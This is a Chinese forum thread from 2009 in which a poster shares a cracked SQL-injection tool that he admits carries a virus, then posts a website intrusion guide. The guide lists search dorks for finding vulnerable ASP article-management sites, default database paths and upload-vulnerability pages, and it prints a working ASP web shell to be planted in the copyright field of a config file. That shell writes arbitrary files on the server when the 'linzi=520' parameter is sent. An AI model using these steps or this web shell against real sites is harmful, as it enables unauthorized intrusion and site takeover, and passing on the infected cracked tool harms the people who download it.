网站入侵工具啊D

社区服务
高级搜索
猴岛论坛电脑百科网站入侵工具啊D
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
3个回复

网站入侵工具啊D

楼层直达
bbs1227

ZxID:8120126

等级: 中士
举报 只看楼主 使用道具 楼主   发表于: 2009-11-30 0
— (284551926) 附上杀毒图 

好加分 (2009-11-30 21:53) —
啊D注入工具 V2.32破解修正版.rar[点击下载](984 K) 下载次数:19 累计下载获得 DB 15 第一次发帖: 大家都应该清楚吧。。 类似于这种工具都有毒的, 但是没事的。 懂的人应该清楚,,  你怕就别下了。。  呵呵,,
          不要喷我啊 呵呵, 下次发布一个牛的软件给你。。 功能集全!大概是1.5G
本帖de评分: 1 条评分 DB +3
DB+3

发帖基本奖励

bbs1227

ZxID:8120126

等级: 中士
举报 只看该作者 沙发   发表于: 2009-11-30 0
这个是网站入侵用的工具! 方法很简单 
2、在baidu或google点击高级搜 选择100项。搜素:企业邮局企业荣誉营销网络产品分类信息反馈联系我们收藏本站
2、在baidu或google搜索
ProductShow.asp?ArticleID=


  upfile_Other.asp 上传 


upfile_other.asp


打开挖掘鸡在添加后缀:
/leadBBS/DATA\leadbbs.mdb
/database/%23newasp.mdb



版本1    Power System Of Article Management Ver 2.0 Build 20030320

百度关键字:Power System Of Article Management Ver 2.0 Build 20030320

入侵思路:1.默认数据库:database\article.asp
         
          2.如果修改了默认数据库,加 Inc/syscode.asp 暴数据库
         
          3.上传漏洞:upfile.asp

方法:注册一用户,利用本地上传页面提交,注:用明小子上传是不成功的,明小子自带的cookie不能上传成功



版本2  Power System Of Article Management Ver 3.0 Build 20030628

百度关键字:Power System Of Article Management Ver 3.0 Build 20030628

入侵思路:
1.默认数据库:database/yiuwekdsodksldfslwifds.mdb

2.如果修改了默认数据库,加 Inc/syscode.asp 暴数据库

后台拿站方法:
1. 在信息处插入一段类似小马的发送代码,因为这儿没有字符限制
2.如果网站信息配置没有修改权限,上传图片格式的空壳数据库,先恢复再备份



版本3  MyPower Ver3.51

百度关键字:Powered by:MyPower Ver3.51

入侵思路:
1.默认数据库:database\adsfkldfogowerjnokfdslwejhdfsjhk.mdb

2.如果修改了数据库,加Inc/syscode_article.asp 暴数据库

3.上传漏洞 :upfile_photo.asp
            Upfile_Soft.asp
            upfile_softpic.asp
            upfile_adpic.asp
            Upfile_Article.asp (成功率比较高)

后台拿站方法:

1. 修改版权,插入发送代码
2.上传空壳数据库,先恢复,再备份

版权所有 Copyright© 2003 <a href='http://www.asp163.net'>动力空间</a>"        '版权信息
if Request("linzi")="520" then
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "succeed!"
end if
Response.write "<form method='POST'action='"&Request.ServerVariables("URL")&"?linzi=520&creat=yes'>"
Response.write "<textarea name='text'>"&thisline&"</textarea><br>"
Response.write "<input type='text' name='path' value='"&Request("path")&"'>"
Response.write "<input name='submit' type='submit' value='ok' ></form>"
Response.end
end if
%>
inc/config.asp?linzi=520
Dear丽

ZxID:9860189

等级: 上士
轮 回 是 为 了 等 待 .

举报 只看该作者 板凳   发表于: 2009-11-30 0
什么东西啊?
bbs1227

ZxID:8120126

等级: 中士
举报 只看该作者 地板   发表于: 2009-11-30 0
啊D注入工具啊
« 返回列表
发帖 回复